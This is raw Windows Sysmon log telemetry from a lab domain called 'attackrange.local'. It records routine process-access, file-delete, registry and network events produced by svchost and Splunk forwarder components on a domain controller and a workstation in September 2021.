09:26:05.403{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057382Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:05.403{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057381Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:05.403{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057380Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:05.403{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057379Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:05.403{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057378Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:05.403{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057377Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:05.403{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057376Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:05.403{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057375Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:05.403{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057374Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:05.403{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057373Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:05.403{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057372Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:05.403{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057371Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:05.403{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057370Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:05.403{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057369Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:05.403{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057368Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:05.403{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057367Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:05.403{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057366Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:05.403{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x8000000000000000981726Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:26:05.440{69CF5F33-7F28-614D-1100-00000000FD01}960C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b381-0xb24f35f7) 23542300x8000000000000000981725Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:05.253{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=025BE768203B149AA061134B33338065,SHA256=83FFDE9E1B0900C3792AF7A54911945F5D36B75AFCA41B2C6713958D241D3749,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981729Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:06.674{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=849CE4CDDB0625FC74B7DFD4B1AAB1F1,SHA256=FD15336F10A687A1785C185DE0F52551EA3A8868F3CE8F348419F6B43AA42658,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057397Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:05.157{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54289-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001057396Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:06.575{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8A2FE7F3FFCA1EA16B43E0063E9E2DF,SHA256=0C5DF9AD5E577F8DA370C08D2189833E7B1D842A862AA85BC2C85051AAC8177B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981731Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:07.753{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C88B2D405DCC7987A5956E6BFBE12ED1,SHA256=CDAA6D65C9C8DC1B9606A9FF0065B2510ADF5F3CBA8B8D8834D4F2648B0C2B9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057398Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:07.575{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65E75255D68FCCCB3F6C4504359FD102,SHA256=8D0FAD869370C92F1BDE0DD044B225DE1FE1E2E05668A8525C085974932424F5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981730Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:04.781{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59567-false10.0.1.12-8000- 23542300x80000000000000001057399Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:08.793{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC0BE0036A9C6277AD6FC7552765D091,SHA256=C5CECDEA3E71191F6E157126CDFED8B6ED83CBBC655CA99A8F3D765E174F0CDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981732Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:08.768{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE09D6B3383B5A3D0239EEECC278BF92,SHA256=0AEA8190EA65F9A163EFCD6C661A1A688FF0763DFE6831CC53DC76F0C8025769,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057402Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:09.872{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61B93BA5939C0CD5FE1D7A9DBF6015E8,SHA256=9E580F8F8CDDA0B37ADCCD8487076DB7AB9B2250E71636185396E46266665D9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981733Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:09.768{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BA0ECE28C9B9529C34DB6F475E67692,SHA256=9F43D6E7405AC792A105A259BA021881AFFB14017D6C152336E5F1FDCE8074DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057401Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:09.122{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=DAA5F07AC27FB4D3BE98AECB7B565158,SHA256=243E407BD82E5D3DAC224D0EDA1AA84F770AD64DDFC04BE51E2411AD0E6E05F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057400Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:09.122{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=E11009D166E7A6D6526A4A7921FAE9D9,SHA256=FB866539F7BC880BB75FBA892D5965739D0F9F0AAFC3FDB75B5EE7DC74F03798,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981734Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:10.784{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E6BA627E8DBACC40633B80E9A4B5C96,SHA256=65BF499C347089AD1C6738635088C4929860FCBEB116136CB0389EC35DACD11F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057403Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:11.106{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB053C2609ABACF6F7575B1D619AEE3D,SHA256=B84640CB96CFB703FDD0D56034519A1FBD0FCE9624923D2A32955DDD1F87025B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981736Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:11.706{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8753298586FFBA034FA9ABAA41DF4D29,SHA256=580EC6769783F93DCBB0795D5B3FAB60C520F5B69EABDE41DD3569299E22646C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981735Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:11.706{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2AD4B92C72F129DE846CC2B89B024214,SHA256=CEEBF904E459D1BD2F9569F8DFD3A9F8F1C965ADA7AAFABCF0EBC255E667CEAE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057405Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:11.095{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54290-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001057404Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:12.137{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F50A0B4E4D53705EBBD86C6247C18347,SHA256=D04BEE914654E32667AE7C59E885B719449811D7D4482ED9C325F4CAD0EBABED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981739Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:12.940{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8753298586FFBA034FA9ABAA41DF4D29,SHA256=580EC6769783F93DCBB0795D5B3FAB60C520F5B69EABDE41DD3569299E22646C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981738Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:09.025{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54402-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981737Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:12.003{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D947B08041E8F275559661BC46F0B99,SHA256=7D35632C3742252F3C9A537F7734FB159765BACE5B3043F237910AB311D5AAFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057406Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:13.137{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 